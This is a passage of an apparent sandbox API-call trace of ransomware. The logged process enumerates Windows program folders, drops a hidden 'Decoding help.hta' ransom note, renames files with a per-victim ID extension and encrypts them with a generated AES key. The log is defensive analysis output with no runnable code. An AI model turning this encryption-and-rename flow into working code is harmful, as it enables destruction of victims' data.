lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.dll" [0057.601] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.601] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.extensions.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.extensions.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.601] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6677fe6, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb6677fe6, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb669e146, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xf000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Web.Routing.dll", cAlternateFileName="")) returned 1 [0057.601] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.601] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.601] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.601] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.601] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Web.Routing.dll") returned -1 [0057.601] lstrlenW (lpString="System.Web.Routing.dll") returned 22 [0057.601] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.601] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.601] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Web.Routing.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Routing.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Routing.dll" [0057.601] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Routing.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Routing.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Routing.dll" [0057.602] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Routing.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Routing.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Routing.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.602] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Routing.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.routing.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Routing.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.routing.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.602] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e608f1c, ftCreationTime.dwHighDateTime=0x1c9ea10, ftLastAccessTime.dwLowDateTime=0x8e608f1c, ftLastAccessTime.dwHighDateTime=0x1c9ea10, ftLastWriteTime.dwLowDateTime=0x8e62f07c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Windows.Presentation.dll", cAlternateFileName="")) returned 1 [0057.602] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.602] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.602] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.602] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.602] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Windows.Presentation.dll") returned -1 [0057.602] lstrlenW (lpString="System.Windows.Presentation.dll") returned 31 [0057.602] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0057.602] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.602] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.602] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Windows.Presentation.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Windows.Presentation.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Windows.Presentation.dll" [0057.602] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Windows.Presentation.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Windows.Presentation.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Windows.Presentation.dll" [0057.602] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Windows.Presentation.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Windows.Presentation.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Windows.Presentation.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.602] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Windows.Presentation.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.windows.presentation.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Windows.Presentation.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.windows.presentation.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.602] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb44d88e8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb44d88e8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb44fea48, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x7c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.WorkflowServices.dll", cAlternateFileName="")) returned 1 [0057.602] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.603] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.603] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.603] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.603] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.WorkflowServices.dll") returned -1 [0057.603] lstrlenW (lpString="System.WorkflowServices.dll") returned 27 [0057.603] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0057.603] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.603] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.603] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.WorkflowServices.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.WorkflowServices.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.WorkflowServices.dll" [0057.603] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.WorkflowServices.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.WorkflowServices.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.WorkflowServices.dll" [0057.603] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.WorkflowServices.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.WorkflowServices.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.WorkflowServices.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.603] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.WorkflowServices.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.workflowservices.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.WorkflowServices.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.workflowservices.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.603] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb656d644, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb656d644, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb656d644, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x22000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Xml.Linq.dll", cAlternateFileName="")) returned 1 [0057.603] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.603] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.603] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.603] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.603] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Xml.Linq.dll") returned -1 [0057.603] lstrlenW (lpString="System.Xml.Linq.dll") returned 19 [0057.603] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.603] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.604] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Xml.Linq.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Xml.Linq.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Xml.Linq.dll" [0057.604] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Xml.Linq.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Xml.Linq.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Xml.Linq.dll" [0057.604] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Xml.Linq.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Xml.Linq.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Xml.Linq.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.604] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Xml.Linq.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.xml.linq.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Xml.Linq.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.xml.linq.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.604] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb656d644, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb656d644, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb656d644, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x22000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Xml.Linq.dll", cAlternateFileName="")) returned 0 [0057.604] FindClose (in: hFindFile=0x5e2bf0 | out: hFindFile=0x5e2bf0) returned 1 Thread: id = 576 os_tid = 0xd44 [0048.601] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\*.*", lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffe6ce0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ffe6ce0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6717b0 [0049.790] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.790] FindNextFileW (in: hFindFile=0x6717b0, lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffe6ce0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ffe6ce0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.790] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.790] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.790] FindNextFileW (in: hFindFile=0x6717b0, lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x19798, dwReserved0=0x0, dwReserved1=0x0, cFileName="AiodLite.dll", cAlternateFileName="")) returned 1 [0050.110] lstrcpyW (in: lpString1=0x24fe73c8, lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\*.*" [0050.110] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\*.*") returned 52 [0050.110] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\Decoding help.hta" [0050.110] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\Decoding help.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\esl\\decoding help.hta")) returned 0xffffffff [0050.110] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\Decoding help.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\esl\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x81c [0055.404] WriteFile (in: hFile=0x81c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x8f4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x8f4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.280] CloseHandle (hObject=0x81c) returned 1 [0058.280] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.280] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AiodLite.dll") returned 1 [0058.280] lstrlenW (lpString="AiodLite.dll") returned 12 [0058.280] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\*.*" [0058.280] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\*.*") returned 52 [0058.280] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\", lpString2="AiodLite.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll" [0058.280] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll" [0058.280] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.280] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\esl\\aiodlite.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\esl\\aiodlite.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.281] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\esl\\aiodlite.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x81c [0058.281] CreateFileMappingA (hFile=0x81c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x308 [0058.281] CryptAcquireContextA (in: phProv=0x8f4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f4fcec*=0x3449f90) returned 1 [0060.191] CryptGenKey (in: hProv=0x3449f90, Algid=0x6610, dwFlags=0x1, phKey=0x8f4fce8 | out: phKey=0x8f4fce8*=0x5da538) returned 1 [0060.191] CryptExportKey (in: hKey=0x5da538, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x8f4fbe4, pdwDataLen=0x8f4fce4 | out: pbData=0x8f4fbe4*, pdwDataLen=0x8f4fce4*=0x2c) returned 1 [0060.191] MapViewOfFile (hFileMappingObject=0x308, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x19780) returned 0x3990000 [0063.740] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8f4fbe4*, pdwDataLen=0x8f4fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x8f4fbe4*, pdwDataLen=0x8f4fcf8*=0x100) returned 1 [0063.742] CryptEncrypt (hKey=0x5da538, hHash=0x0, 